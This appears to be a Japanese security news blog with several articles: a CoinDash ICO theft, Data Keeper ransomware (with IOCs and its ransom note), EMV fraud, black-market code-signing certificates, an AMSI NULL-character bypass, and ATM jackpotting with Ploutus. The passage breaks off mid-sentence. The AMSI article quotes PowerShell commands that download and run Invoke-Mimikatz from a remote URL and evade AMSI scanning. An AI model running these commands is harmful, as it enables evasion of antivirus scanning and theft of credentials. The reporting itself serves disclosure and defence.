CoinDashのICO時に盗まれたEthereumの2/3が返送。理由は不明。
CoinDashが管理するEthereumアドレスに、去年の7月に行なったICOで盗まれたEthereumの一部が返送されてきたようだ。
今回の記事では以下のような順序で説明していく。
- CoinDashというプロジェクトについて
- CoinDashのICOハッキング被害の概要
- Ethereumが返送された理由について
CoinDashとは
CoinDashとは、仮想通貨のポートフォリオ管理をブロックチェーン上で行うことが出来るWebサービスの1つである。
自らが保有する仮想通貨ポートフォリオを管理でき、CoinDashの発行するトークン(CDT)を支払えば他者のポートフォリオを閲覧する事が出来る。
執筆時点(2018/02/27)で、ポートフォリオ管理サービスのプロダクトローンチを数時間以内に控えている。
CoinDashハックの概要
2017年7月、CoinDashはICOを実施した。
ICOとは、Initial Coin Offeringの略で、仮想通貨関連プロジェクトを行う企業が、独自の仮想通貨トークンを発行して資金調達を行う方法である。
いわば、仮想通貨によるクラウドファンディングと考えればいいだろう。
現在は、CoinDashのようなICOのタイミングを狙ったハッキング被害を教訓として、ICO投資を行う人に対してKYC(Know your customer)というプロセスを実施し、KYCプロセスをパスした人だけがICOに参加出来る形式である事が多い。
プロジェクトによって異なるが、一般的にはKYCを経たユーザーがアカウントを保有し、管理画面にログインすると仮想通貨の送信先として指定されているアドレスが表示される。
しかし当時は、ICOの方法は今ほど洗練されていなかった。
ウェブサイト上に一般公開されていた受取用アドレスに対して、自らの仮想通貨を送信する方法が採用されていた。
そこに狙いを付けたのがCoinDashを襲ったハッカーであった。
悪意を持った何者かが、CoinDashのウェブサイトを改ざんする権限を持ち、CoinDashのICO参加者からEthereumを受け取るアドレスを、ハッカーの所有するアドレスに変更したのだ。
仮想通貨のアドレスは、ランダムな文字列を組み合わせたものであるため、一見するだけでは、それが正しいものであるかどうかを判別する事が出来ない。
ウェブページ上に掲載されていた受信用アドレスが改ざんされたのは、ICO期間である。つまり、投資家たちから資金を受け取っている最中であった。
その為CoinDashは、改ざんが行われる前の正しいアドレスに対して送られてきた当時の価格で753万ドル分のEthereumを受取った。
しかし、ハッカーによって改竄された後に攻撃者のアドレスに送信された780万ドル分のEthereumは盗まれてしまった。
攻撃者がCoinDashへ返金
しかし最近になってその攻撃者が、CoinDashのアドレスに盗まれた分のお金が返送されてきた。
返金は2段階に分けて行われた。
1段階目は2017年の9月に行われ、10,000ETHがCoinDashに返送された。
2段階目は、先週の金曜日に20,000ETHがCoinDashに返送されてきた。
ICO時に盗まれた全てのEthereumが返金されたわけではなく、現段階も13,400ETHを保有している。
返金の理由には諸説あり
CoinDashに対して、何故、攻撃者が盗んだ仮想通貨の3/4もの額をCoinDashに返金したのかは明確に分かっていない。
CoinDashがICOを行なった時と比べて、Ethereumの値段は大きく上昇している為、CoinDashのICOを狙った攻撃者が保有するEthereumは、返金した分を除いても、盗んだ当時の価値よりも多い。
とあるセキュリティ専門家が指摘する所によれば、CoinDashを狙った攻撃者は盗んだ直後にEthereumの洗浄を行わなかった為、ほとんど全ての取引所にブラックリストに追加されてしまい、盗んだEthereumを換金する事が出来なかった。
攻撃者のアドレスは”FAKE_CoinDash”と名前が付けられており、そのアドレスから行われるあらゆる取引を第三者も監視できる。
(ハッカーが保有するEthereumアドレス。20,000ETHがCoinDashのアドレスに返送されている。)
他に考えられる理由としては、そもそもハッキング自体がCoinDashの内部犯行であり、CoinDashのプロダクトローンチが近づいていることから、メディアの関心を引きつける為に今になってEthereumの返金が行われたのではないかという説もある。
その説に関しては、根拠の無い憶測の域を出ないので、信憑性は無いに等しい。
(CoinDashのWebサイトで、プロダクトローンチを告げるカウントダウンタイマー)
尚、CoinDashのICO時に改ざんされたEthereumアドレスに誤って送ってしまった投資家に対しても、CoinDashのトークンが発行された。
その為、ユーザーの立場からすればハッキングの被害は殆どなかったと言ってもいい。
しかし、CoinDashのウェブサイトが改ざんの被害に遭った事が、投資家達の間で「セキュリティに懸念がある」というイメージを植え付けてしまったのは事実である。
CoinDashは、イスラエルの”Counter Terrorist Unit”に攻撃者の追跡を依頼しているという。
ランサムウェア”Data Keeper”による被害を確認。過去三番目のRaaS被害。
Data KeeperというRaaS(Ransomware as a Service)の部類に分類されるサービスが話題になっている。
RaaSのサービス形態を取るランサムウェアが確認されたのはこれで3件目である。
これまでにはSaturnやGandCrab等のRaaS型ランサムウェアが確認された。
Data Keeperは2,018年2月12日にローンチされ、同月20日に公開。その僅か二日後に最初の被害者が確認された。
Data Keeperの概要
Saturnのように、誰でもData Keeperの利用者ポータルサイトにサインアップする事が可能で、登録すればすぐに攻撃用のバイナリファイルをダウンロードすることが出来る。
世の中に存在する多くのWebサービスは一部の機能だけ無料公開して、全ての機能を利用するためにはアクティベーション・フィーを支払う必要があるが、Data Keeperは無料で全ての機能を使う事が出来る。
Data Keeperの管理者は、被害者が支払う身代金の数十%をRaaS登録ユーザーに支払う事をインセンティブとして、RaaS登録ユーザーに対してランサムウェアを拡散するよう促している。
同じRaaS型ランサムウェアのSaturnは、身代金の30%を登録ユーザーに報酬として支払う事を公開しているが、Data Keeperは報奨金の割合は公開していない。
Data Keeperのアプリの設定画面には、RaaS登録ユーザーが自身のBTCをアドレスを入力する事が出来る。
恐らくData Keeperの被害者が、指定のBTCアドレスに身代金を送付する際に、自動的に設定画面で入力されたBTCアドレスに”分け前”が送付されるのだろう。
Data Keeperを開発した人は高度な.NETスキルを有する
.NETで書かれたランサムウェアは、従来の見方だと「クオリティが低い傾向にある」と見なされて来たが、Data Keeperの開発者は高度な.NETコーティングスキルを有している事が伺える。
Data Keeperの調査を行なったData Keeperに関して調査を行なったMalwareHunterTeamのコメントを抜粋する。
Data Keeperは大まかに4つの層で構成されている。
- Dropperとして機能する.exeファイル・・・このDropperは、別の.exeファイルを.binファイルと一緒に、%LocalAppData%フォルダにランダムな文字列で、名前を付けて保存。
- Dropperによって保存された2つ目の.exeファイル・・・この.exeファイルは、以下のパラメータを使用して実行される(ProcessPriorityClass.BelowNormalとProcessWindowStyle.Hidden)。
- ②で実行された.exeファイルがdllファイルをロードする。
- ③でロードされたdllファイルが、別のdllファイルをロード。ここにランサムウェアが潜む。
Data Keeperは、上記したレイヤーのそれぞれに、リバースエンジニアリングを防ぐ目的で難読化ツールの”ConfuserEx”を使用している。
更に、別コンピュータをリモートで操作出来るWindows管理者ツール、”PsExec”も実装されているようだ。
PxExecが実装されているのは、同ネットワーク上の別コンピュータにランサムウェアを感染させる目的だとされる。
DataKeeperは”被害者泣かせ”
Data Keeperは、万が一被害に遭った時に復旧するまでの時間を長くするように出来ている。
以下に2つのポイントに分けて、いわば”被害者泣かせ”なData Keeperの設定に関して見ていく。
①暗号化したファイルの拡張子を変更せず
一般的にランサムウェアが感染端末のファイルを暗号化する際には、暗号化するファイルの拡張子を任意の文字列に変更する事が多い。
しかしData Keeperは暗号化するファイルの拡張子を変更しない。
その為、感染端末を使用するユーザーが実際に端末内のファイルを開かないと、どのファイルが暗号化されたかどうか判断できない。
Data Keeperの被害に遭った事実の確認方法に関しては、暗号化されたファイルを含むフォルダ全てに以下のようなHTMLファイルが作成される。
"!!! ##### === ReadMe === ##### !!!.htm"
そのファイルを開くと、以下の様に表示される。
②ネットワーク上のシェアフォルダ全てを暗号化する
Data Keeperの開発者が、暗号化したファイルの区別を不可能にしたのは、ユーザーが身代金を払う可能性を上げる目的だと思われる。
更にData Keeperが暗号化するのは、感染端末内のファイルに限らない。
感染端末のユーザーがアクセス権限を有する、全てのネットワークシェアフォルダに保存されているファイルも暗号化の対象となってしまう。
その為、企業内でも広範囲にアクセス権限を有するユーザーが感染すると、最悪の場合ネットワーク上の殆どのファイルが暗号化されてしまう事になるだろう。
IOC
Encrypter:
912bfac6b434d0fff6cfe691cd8145aec0471aa73beaa957898cfabd06067567
Decrypter:
8616263bdbbfe7cd1d702f3179041eb75721b0d950c19c2e50e823845955910d
ランサムノート:
All files in this directory have been encrypted.
For decrypt files:
Download Tor Browser
Run it
For create decryption keys, copy link at the bottom of this page and paste to the address bar and go it
If count of links greather than one, next link must be added ONLY AFTER PAYMENT FOR PREVIOUS KEY.
Links for create decryption keys:
(Do not change the "token" parameter otherwise your data will be lost)
[REDACTED_URL]
EMVチップ採用でカード詐欺の被害数70%減少(VISA調べ)。
オンラインショッピングを利用する機会が増えてきた事で、クレジットカード情報の盗み取りを狙うクラッカーも増えている。
ダークウェブでは盗み取られたクレジットカード番号が、持ち主の名前とPINコードと共に販売されている事態だ。
私の知人が中国に留学した際に現金のみを使うことを心がけていたのにも関わらず、空港で大きなお金を払わねばならず、仕方なくクレジットカードを使用した事があった。
その時は問題なく使えたのだが、後でクレジットカード支払い履歴を見たら、見覚えのない支払いが発生していた事が判明したようだ。
その人は直ちにカード会社に連絡して払い戻しを行なったようだが、クレジットカード会社からしてみれば、カード番号を盗み取った何者かに対してお金を渡したようなものである。
そうした被害を食い止めるために、クレジットカード会社としてもクレジットカードのセキュリティを向上する必要がある。
数多くあるセキュリティ向上のためのアプローチの1つとして、EMVチップ搭載のカードに関してVISAが面白いデータを公表していたので、掘り下げていきたい。
EMVカードとは
EMVとは、クレジットカードに付帯している金色のチップの事。
EMVという名前は、Europay、MasterCard、VISAの三社が統一基準として開発し、他のカード会社へも業界スタンダードとして普及している。
日本では、ICチップという呼び名のほうが一般的かもしれない。
POSに代わってiPadを使用したカード決済システムを小売店などに提供しているSquareのホームページに、EMVに関して説明する以下のような動画があったので、参考にするといいだろう。
EMVカードが開発された背景
元々はカード裏面上部に磁気ストライプがあり、専用の読取機でカードをスワイプする事で支払い手続きを行うことが出来た。
だが磁気ストライプはセキュリティ面で不安があった。
なぜなら磁気ストライプはカセットテープに用いられていた技術であり、カードのスキミングとして知られる手法で簡単にデータの読み取り、カードの複製を行うことが出来たからだ。
カードの持ち主にとって身の覚えのない不正利用が遭った場合、持ち主に対して金額の補填をするのがカード会社である。
つまりカード会社としても、スキミングされにくく、支払い処理が盗聴されても読み取られる事のないカードを開発する必要があった。
そうした背景から、カード会社同士で統一した方法でセキュリティ面で磁気ストライプよりも安全なEMVチップ搭載型のカードを開発したのだ。
EMVカードの成果
VISAは、2015年9月から2017年12月までのEMVカードに関するデータを公開した。
以下にそれぞれのポイントに分けて説明していく。
- EMVカードに対応した店舗
- VISAのICカード普及について
EMVカード情報を盗み取る事は可能か
上記のセクションでは、VISAの公表したデータに基いて、EMVカードの安全性について述べたが、EMVカードのエクスプロイト方法は報告されている。
2016年にアメリカ、ネヴァダ州のLas Vegasで開催されたBlack Hat Conferenceで、Tod Beardsley氏がエクスプロイト手法を公表した。
Beardsley氏の方法は、EMVカード読み取り機能を備えたATMに対してRaspberryPiを使用して中間者攻撃を行い、EMVカードのPIN情報を盗聴する。
エクスプロイト手法に関する技術的な詳細に関しては、彼がBlackHat USA2016で使用したスライドが参考になる。
このようなEMVカードの情報抜き取りは、既に南アメリカ等の観光客が集まる所で被害が確認されているようだ。
同時に、Beardsley氏はEMVチップに関して「磁気ストライプよりはセキュリティが向上している」と示唆。
そうしたBeardsley氏のコメントに沿って言えば、前セクションにおけるVISAが公表したEMVカードの普及に伴うカード詐欺被害件数の減少を、大きな成果として捉えていいだろう。
日本のクレジットカード普及に関する目標、所感
日本としては、2020年の東京オリンピック開催年に向けて「世界で最もクレジットカード利用が安心・安全な国 日本」を実現しようとしているようだ。
経済産業省が公開した「クレジットカード決済の健全な発展に向けた研究会 中間報告書」によれば、2020年のオリンピックまでに流通しているクレジットカードの100%をICカード化する目標がを掲げている。
支払いの度にクレジットカードで決済を行うことで自動で為替計算を行なってくれるクレジットカードは便利である。
両替手数料のかかる現金を一切持ち歩かずに、クレジットカードのみ使いたい外国人観光客は多い事は言うまでもない。
途上国などでクレジットカードを使用してスキミング被害に遭った知人がいたが、私も個人的に外国でクレジットカードを使う場合には慎重にならざるを得ない。
現状では、日本では未だにクレジットカード決済に対応していない店が大多数を占めるので、ICカードの普及に合わせて急ピッチで整備を進められるだろう。
クレジットカード決済に対応した店舗が次々に生まれて暮らしが便利になるのは1ユーザーとして非常にありがたい事である。
が、それと同時にセキュリティ面に不安があると観光客の足も遠のく自体は避けねばならないと思う。
2020年まで後2年を切っているのだから、EMVチップ読み取り機能を搭載した決済端末を急ピッチで進めて貰いたい。
コードサイニング証明書を「不正入手」するオンラインサービスの人気は続くのか。
セキュリティソフトが、あるソフトウェアを「問題なし」又は「脅威」として判断する方法の1つに、ソフトウェアの「コードサイニング証明書」がある。
コードサイニング証明書はダークウェブを始めとする裏マーケットで取引されており、証明書を発行元となる機関や企業によって、非常に高値を付ける証明書もあるようだ。
コードサイニング証明書は、認証局から盗み出されたものであると長年信じられてきた。
ところが、Recorded Futureが発表した調査によると、闇取引されているコードサイニング証明書はハッキングによって漏洩したのではなく、不正に発行された証明書である可能性が高いようだ。
コードサイニング証明書の価値とは何か
コードサイニング証明書とは、プログラマーが自身が作成したプログラム、モジュール、ActiveXコントロール等に、自分自身が作成した事を示すデジタル署名の事である。
ソフトウェアを入手したユーザーは、コードサイニング証明書を参照する事で、ソフトウェアの配布元を認証する事が出来る。なりすましや改ざんが行われていないか等のサプライチェーン攻撃の対策にもなるのだ。
また、セキュリティソフトを使って顧客環境のプロセス監視を行ったり、マルウェア検体の解析を行うアナリストは、コードサイニング証明書を確認する。
つまり、正当なコードサイニング証明書をマルウェアに付ける事で、そのマルウェアがユーザーやアナリストの目を盗んでターゲットのシステムに侵入出来る可能性を上げられるのだ。
したがってコードサイニング証明書は、マルウェア配布者にとって非常に価値のあるものである事が分かる。
闇市場で出回る証明書の殆どが「不正入手」されたもの
これまで長い間、闇マーケットで出回るコードサイニング証明書は、攻撃者が認証局に何らかの方法でハッキングを行い、盗み出されたものであると信じられてきた。
しかしRecorded FutureのAndrei Barysevich氏の調査によれば、それら証明書は然るべき手順を踏んで正当なソフトウェアベンダ・作成者に対してユニークに発行されたものである可能性が高い事を指摘。
更にBarysevich氏の調査では、コードサイニング証明書の発行申請は、予め盗み出されたMicrosoftやAppleを始めとする正式なベンダに所属する社員の認証情報を使用して行われた可能性が高いとしている。
したがってマルウェアのコードサイニング証明書は、第三者が正当な企業・機関に所属する認証情報を用いて「不正入手」されたものと言えるのだ。
闇マーケットからコードサイニング証明書を入手する方法とは
Barysevich氏は自身の報告の中で、ダークウェブにコードサイニング証明書を販売するオンラインショップがある事を指摘。
コードサイニング証明書を取得したい顧客は、そのオンラインショップで注文をする。
するとオンラインショップの運営者は、予め確保した企業やその社員の認証情報を使用して、任意の認証局にいって偽物のソフトウェアに対するコードサイニング証明書を入手。
証明書を受け取った顧客は、自身の作成したマルウェアに証明書を付け自分で使用するか、「証明書チェックをくぐり抜けるマルウェア」として自らの顧客に対して販売を行うのだ。
また、Barysevich氏は以下のように語る。
ほぼ間違いなく「なりすまし」に加担させられている企業や社員は、このように違法取引に自身の認証情報が悪用されているに気づいていないであろう。
高価な為マルウェア作成者の多くは”敬遠しがち”
ここまで証明書に関して説明してきたが、”値の張る”証明書はさほど人気ではい。
実際に値段を見てみよう。
証明書を販売するオンラインショップでは、以下の有名な認証局から発行される証明書もサービスの一部に含んでいる。
- Comodo
- Thawte
- Symantec
(この記事ではコードサイニング証明書に絞って説明しているが、実はEV SSL証明書も販売されている。Recorded Futureより引用。)
見て分かる通り、購入価格は発行機関や証明書のタイプによって異なり、$299〜$1799と、証明書でも価格差が$1500もある。
この「値の張る」価格が、マルウェア開発者を遠ざけている原因である。
セキュリティソフトによる証明書チェックを避けてターゲット端末を感染させる方法には、ここから”正当な”証明書を購入する以外にも、比較的廉価なCrypter等のコード難読化ツールを使う方法があるからだ。
今後もこの高い値段を1つの原因として、多くのマルウェア開発者の間で人気が出るサービスとはならないであろう。
だが、可能な限りセキュリティソフトによる検知を逃れ、特定のターゲットに侵入する特別な目的を持つ攻撃者からしたらどんな手を使ってでも検知を避けたいと思うものである。
したがって、資金力のある攻撃者などからは、今後も証明書の購入は支持され続けるだろう。
NULL文字を含むコマンドを実行すると無視するバグがAMSIに存在。Microsoft社は月例パッチで修正済み。
Windows 10に標準搭載されているAMSIという機能にバグがあり、NULL文字を先頭に含んだコマンドを実行すると、セキュリティソフトによる検知をバイパスして任意のコマンドを実行してしまう。
このバグは、カナダ・バンクーバーで活動するSatoshiTanda氏のブログで公開された。
既にMicrosoftは今月の月例パッチでパッチをリリースしているが、ここで一度AMSIに見つかったバグと、そのエクスプロイト手法について見ていこう。
AMSIとは何か
AMSIとは、Antimalware Scan Interfaceの略。
Windows 10から搭載されたセキュリティ機能の1つであり、任意のアプリと、エンドポイントセキュリティソフトの”中間点”に立つ機能である。
AMSIはPowerShell、VBScript等のコマンドスクリプトを実行する際にイベントを作成し、AMSIプロバイダー(セキュリティソフト)に送信する。
セキュリティソフトは、AMSIから受信したスクリプトやコマンドの内容をスキャンする事が出来、悪意のあるコードを含んだスクリプトであると判断した場合は実行を防ぐ。
このバグの発見者であるTanda氏のブログでは、このプロセスを以下の図を使って説明している。
(AMSIが”中間”に存在してコマンドのチェックを行っている事を示す図。Tanda氏のブログ記事より引用。)
図中の左側に位置しているのは、PowerShell(System.Management.Automation.dllなど)や、Windows Script Host(JScript.dllなど)のスクリプトエンジンだ。
そして、図の中央に位置するのはAMSIで、図左のスクリプトエンジンから、コマンドやスクリプトを実行前に受け取る。
最後に、図中の右側に記載されている”AMSI Provider”は、セキュリティソフトウェアを示す。
ここでいうセキュリティソフトとは、単にWindows Defenderに限らず、AMSIに対応しているセキュリティソフトである。
AMSIからスクリプトを受け取って、それぞれの方法でスキャンをし、悪意のあるコードを含むと判断した場合にはブロックし、実行を未然に防ぐ事が出来るのだ。
AMSIに発見されたバグのエクスプロイト
それでは前セクションのAMSIに関する説明を踏まえて、実際にどのようなバグがあるのか見ていく。
このエクスプロイトを簡単に説明すると、AMSIが受け取るスクリプトに”NULL”文字を入力する事で、それ以降のスクリプトのスキャンがされなくなる。
このバグの発見者であるTanda氏のブログでは、以下の2パターンでエクスプロイトする方法を説明している。
- ファイルベース
- CUIベース
流れとしては、以下のようになる。
では、それぞれについて説明していく。
ファイルベースのエクスプロイト
例えば、Invoke-Mimikatzを実行してターゲット端末をエクスプロイトする方法を考える。
尚、Mimikatzとは、アカウント情報などをターゲット端末から窃取する為に使われるハッキングツールである。
参考URL(外部リンク)
それでは、以下のPowerShellコマンドを実行してMimikatzをダウンロードしてみよう。
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-DefaultMimikatz.ps1')"
すると、以下の様なアラートが上がる。
(AMSIが正常に動作し検知アラートが上がった。Tanda氏のブログ記事より引用。)
この場合AMSIが正常に機能しており、以下の様にダウンロードするファイルの中に”Mimikatz”という文字列が含まれている事を、AMSIが正常に検知している事を示す。
(Invoke−Mimikatzという文字列が認識されている。Tanda氏のブログ記事より引用。)
次に、以下のようにNULL文字を含んだPowerShellコマンドを実行する。
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1')"
(NULL文字を挿入。Tanda氏のブログ記事より引用。)
すると、AMSIからコマンドを受け取るはずのセキュリティソフトによる検知がなされず、以下のようにダウンロードが成功する。
(Invoke-Mimikatzのダウンロードに成功している。Tanda氏のブログ記事より引用。)
以下の画像を見ると、AMSIがMimikatzという文字列が認識していないことが分かる。
(正常に動作した場合Invoke−Mimikatzの文字列があるはずだが、何も認識されていない。Tanda氏のブログ記事より引用。)
コマンドラインベース
上記のファイルベースのバイパス手法を使って、AMSIによる検知を逃れてターゲット端末にダウンロード成功できた。
続いて、CUIベースでターゲット端末でAMSIによる検知をバイパスするコマンドを実行してみよう。
まず初めに正常にAMSIが機能した場合に、Mimikatzを検知して実行を防ぐケースを考える。
以下のコマンドを実行すると、”Invoke-Mimikatz”という文字列があるために検知されてしまう。
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); Invoke-Mimikatz -DumpCerts"
コマンドラインを使った検知を逃れる為の方法として、以下の様にコマンドを編集してバイパスする方法があるが、AMSIによる検知は避けられない。
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('Invoke-'+'Mimikatz -DumpCerts')"
実際に見てみると、正常に検知している事が分かるだろう。
(正常に”Invoke−Mimikatz”という文字列を認識している。Tanda氏のブログ記事より引用。)
それでは、NULL文字をエクスプロイトコマンドの先頭に挿入して、以下のコマンドを実行してみよう。
赤字になっている文字列は、NULL文字の挿入を意味する。
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('if(0){{{0}}}' -f $(0 -as [char]) + 'Invoke-'+'Mimikatz -DumpCerts')"
このコマンドを実行すると、以下のように表示されるはずだ。
if (0) {<NULL>}
実際に、AMSIによる検知をバイパスしてコマンドが実行された事が分かる。
(NULL文字以降のコマンドが認識されていない。Tanda氏のブログ記事より引用。)
実際にコマンドプロンプトも表示され、Mimikatzが実行されている。
(Mimikatzが起動している。Tanda氏のブログ記事より引用。)
このバグが示唆する現在の攻撃トレンド
今回Tanda氏によって発見されたバグは、既に自動パッチに含まれている。
その事から、最新のアップデートを行えばこのバグを突くエクスプロイトが成功する可能性は低くなる。
しかし最近の攻撃者のトレンドとして、Windows公式のアプリに存在するバグをエクスプロイトしてPowerShellコードを実行する手法が流行している事を考えると、無視できるバグでは無い事が分かる。
”従来の”「ファイル型・マルウェア」から、「ファイルレス・マルウェア」を悪用した攻撃手法に切り替えた攻撃者からすると、攻撃のバリエーションが1つ増えた事になる。
既に先日行われたPatch Tuesdayでパッチされたバグなので、システム管理者はエンドユーザーに迅速なパッチ適用を呼びかけたい。
アメリカに忍び寄るATMジャックポッティング攻撃。
「大当たり」が出続けてお金を吐き出し続けるカジノのスロットマシンを「ジャックポット」と呼ぶ。
実はサイバーセキュリティの分野にもジャックポットは存在する。
ATMだ。
ATMをエクスプロイトして行うジャックポッティング攻撃は、これまで世界各地で行われてきた攻撃手法である。
しかし、2017年夏に行われたセキュリティカンファレンス「Black Hat」行われたデモンストレーションによって更に注目を集めた。
(BlackHatで行われたデモンストレーション。WIREDより引用。)
実は、何故かアメリカではジャックポッティング攻撃の被害件数は少なかった。
だが最近になってアメリカのATMメーカーによって注意喚起が出されるなど、アメリカでも警戒感が高まっている。
そこで今回の記事では、アメリカで問題視され始めたATMジャックポッティングに関して、以下の項目にまとめながら詳しく説明していく。
- ジャックポッティング攻撃とは何か
- ジャックポッティング攻撃に使われるマルウェアについて
- ジャックポッティング攻撃の対策方法
それでは始めましょう!
ジャックポッティング攻撃とは
ジャックポッティング攻撃を起こすためには、「物理的なATMへのアクセス」し、その後に「マルウェアのインストール」を実施する必要がある。
ATM攻撃用マルウェアは、ATM機器内のPCにインストールされると、ATMのPINコード入力用パッドか、攻撃者が持参した外付けキーボードからの入力を受け付ける。
攻撃者は端末の出金用モジュールに対してコマンドを実行し、ATM内にある現金を引き出すのだ。
このセクションでは攻撃手法の大まか流れについての説明に留める。マルウェアの技術的な説明は後半のセクションで詳細にする。
数年かけてアメリカに接近した「ATMジャックポッティング攻撃」
ATMジャックポッティング攻撃が最初に確認されたのはロシアと言われている。
そこからヨーロッパとアジアに広がり、南アメリカ、メキシコへと広がっていったようだ。
メキシコで発生したジャックポッティング攻撃の手順とは
2013年にメキシコで発生したジャックポッティング攻撃被害に使われた手法を簡単な手順で説明すると以下のようになる。
- 攻撃者はATM上部にある蓋をこじ開けてATM内部のPCに接続する
- PCのHDDを攻撃者が用意したHDDに入れ替える
- 医療用の内視鏡を使ってATM機械の奥深くにあるリセットボタンを押す
攻撃者が用意したHDDには、ATM内のPC内にインストールされたOSに加えてマルウェアが仕込まれているとされている。
ATMジャックポッティング攻撃で使用されるマルウェアについて
ATMジャックポッティング攻撃で使用されるマルウェアは多岐に渡る。
以下は過去に確認されたマルウェアのリストである。(リンクはBleepingComputerの関連ニュース記事)
これらのリストの内、アメリカの金融機関によって注意喚起が行われているマルウェアはPloutusである。
Ploutusについては、後半のセクションで詳しく説明する。
アメリカでジャックポッティング攻撃の注意喚起が行われ始める
2018年1月26日、アメリカに拠点を持つATM製造を専門とする大企業のNCRは、顧客に対してATMジャックポッティング攻撃に関する注意喚起を行なった。
ジャックポッティング攻撃はNCR製のATMに限定されておらず、どのメーカーが製造したATMに対しても発生しうる攻撃ではある。
しかしNCRはセキュリティ研究者のKrebs氏の行なったインタビューに対して、以下のように回答した。
(ジャックポッティング攻撃は)業界全体の問題と受け止めている。これを機に適切なステップを踏んで顧客のATMを攻撃から守れるように対策を打つべきだ。
NCRの注意喚起では、同社のATMをエクスプロイトするATMマルウェアがどういった種類なのかは明確になっていない。
しかしアメリカのシークレットサービス(明確な情報源は不明)によると、「ある犯罪組織はスタンドアローン型ATM機器を狙った攻撃にはPloutusを使用している」とKrebs氏に回答している。
また、Krebs氏がDiebold Nixdorfから入手したセキュリティレポートによれば、2013年にメキシコで発生したジャックポッティング攻撃と同じ手法を使って攻撃が行われているようだ。
ちなみにDiebold Nixdorfとは、NCR同様にATM等の金融業界向けのソリューション・サービスを提供する企業だ。
ジャックポッティング攻撃の対象となるATMモデル
ATMジャックポッティング攻撃の対象になるとされるモデルは以下。
- Opteva 500
- Opteva 700
参考記事(外部リンク)
これらのATMはスタンドアローン型で、主に薬局、ショッピングセンター、ドライブスルー型ATM等に設置されるような端末だ。
既に被害に遭ったケースもあるようだ。
その際は、ATM修理業者として変装した実行犯が、ATMの蓋を開け、ATMで使われているOSのミラーOSをインストールしたノートパソコンと携帯電話を接続した。
興味深いことに、実行犯は携帯電話に以下のように内視鏡を接続してATMの筐体内で接続口を見つけて操作を行なったとされている。
(スマホに接続された内視鏡。KrebsOnSecurityより引用。)
実行犯が接続を終えると、ATMの画面には”Out of Service”という画面が表示される。
そして遠隔地にいる主犯に連絡をし、遠隔から悪意のある命令文を含むコードを実行してATM筐体から出金する。
Krebsがシークレットサービスのスタッフから聞いた話では、「過去に発生したPloutusを使用したジャックポッティング攻撃では、毎23秒に40枚の貨幣を出金していた」とされる。
アメリカで既に逮捕者も確認
2018年2月6日にロイター通信社が報じたニュースによれば、既に2人の青年がATMジャックポッティング攻撃の犯行に及んで逮捕された。
彼らが逮捕されたのは1月27日で、逮捕時点で二人は総額$9,000を全て20ドル札で保有していたという。(※注釈:アメリカのATMでは20ドル札が最高単位です。)
また、警察は逮捕時の取り調べで、その二人からATMジャックポッティング攻撃に使ったとされる道具を押収した。
ATMジャックポッティングを引き起こすPloutusとは
Ploutusは2013年にメキシコで最初に確認された。
Ploutusに感染したATMを操作するためには2種類の方法があるようだ。
- 外付けキーボードを接続
- SMSメッセージ
外付けキーボードを接続してコマンドを実行する方法は他のATMマルウェアでも確認されていた操作方法だが、SMSを送信する手法はPloutusが初めてのようだ。
ちなみにPloutusには、メインのPloutousの他に、派生したPloutus.Dが存在する。
Ploutusを使うATMジャックポッティング攻撃には2つの手法がある。
- SMSメッセージを使う手法
- 外付けキーボードを接続する手法
それぞれについて説明していきたい。
外付けキーボードを接続してATMをエクスプロイトする手法
ATMから出金する為には、以下の様にPS/2又はUSBポートに外付けキーボードを接続する。
(ATM上部の蓋を外して内部のPCに外付けキーボードを接続している。FireEyeより引用。)
マルウェアのランチャーがATMにインストールされると、まずキーボードを認識する。
ランチャーの解析画像を見ると、攻撃者は「Fnキーのコンビネーション」で任意の操作を実行できるようだ。
(攻撃者のFnキーの入力コンビネーションによって任意のクラスを呼び出している。FireEyeより引用。)
尚、オリジナルのPloutusではFnキーのコンビネーションのみの入力を受け付けるが、Ploutus.DはATM筐体に付属するキーパッドから数字の入力も受け付ける。
ランチャーで実行できる主なタスク、及びそれに関わる.exeファイルは以下。
- ランチャーのリソースセクションから読み込んでプログラムをスタートする
- C:\Program Files\Diebold\Agilis Startup\AgilisShellStart.exe
- Main.exe
- XFSConsole.exe
- プロセスをKillする
- NHOSTSVC.exe
- AgilisConfigurationUtility.exe
- XFSConsole.exe
- ファイルを削除する
- NetOp.LOG – Secure Remote Management solution
- 端末をリブートする
- “wmic os where Primary='TRUE' reboot”
ランチャーの中身はReactorを使用して難読化されている。リバースエンジニアリング対策である。
(難読されたコード。FireEyeのブログ記事より引用。)
任意のFnキーのコンビネーションを使って起動すると、GUIが立ち上がる。
そこで予めプログラムされた8桁の数字を入力するとATM筐体内のお金を出金操作を開始する。
攻撃者はATMから出金する金額と、出金操作を何回リピートするか入力出来る。
リピート回数を入力するのは、出金できる回数に制限がある事が原因だろう。
(攻撃者からの入力を受け付けるコード。FireEyeより引用。)
SMSメッセージを使うATMジャックポッティング攻撃
SMSメッセージを使ったATMへのコマンド入力の簡単な流れはこうだ。
- USBケーブルを使ってスマホをATMに接続する
- 別のスマホから、ATMに接続したスマホへ定められたフォーマットでSMSメッセージを送信する
- ATMに接続されたスマホは受信したSMSメッセージを読み取り、ネットワークパケットに変換してUSBケーブル経由でATM端末に送信する
もう少し具体的に見ていこう。
ATMにインストールされたマルウェアのモジュールにNetwork Packet Monitor(以下、NPM)が含まれる。
NPMの役割はATM内で発生する全てのネットワークトラフィックを監視することだ。
NPMの監視下にあるATMが、TCP/UDPパケットを攻撃者のスマホから受信するとNPMが受信したパケットをパース(解析→変換)する。
NPMがパケットをパースする時に探すのは”5449610000583686”という数列で、この数列を検知すると、それ以降にある16桁の数字を読み取る。
そして検知した数列と、以降の16桁の数字を組み合わせて以下のようなコマンドをPloutusに対して実行する。
